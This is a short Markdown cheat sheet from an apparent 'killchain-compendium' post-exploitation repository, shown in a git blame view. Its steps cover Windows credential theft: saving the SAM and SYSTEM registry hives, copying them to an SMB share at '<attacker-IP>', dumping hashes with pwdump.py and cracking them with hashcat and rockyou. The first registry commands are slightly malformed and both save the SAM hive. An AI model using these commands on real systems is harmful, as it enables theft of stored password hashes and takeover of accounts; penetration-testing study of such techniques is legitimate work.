killchain-compendium/post_exploitation/docs/powershell.md

25 lines
528 B
Markdown
Raw Normal View History

2021-09-08 02:09:14 +02:00
# Powershell
## HashDump
```sh
save HKLM\SAM C:\Users\Administrator\Desktop\SAM
save HKLM\SAM C:\Users\Administrator\Desktop\System
```
* Use `samdump2`
2021-10-16 00:40:15 +02:00
## Extract Hashes
* Extract via smb server on attacker
```
copy C:\Windows\Repair\SAM \\<attacker-IP>\dir\
copy C:\Windows\Repair\SYSTEM \\<attacker-IP>\dir\
```
* Crack via [creddump7](git clone https://github.com/Tib3rius/creddump7)
```
python pwdump.py SYSTEM SAM
```
or
```
hashcat -m 1000 --force <hash> /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
```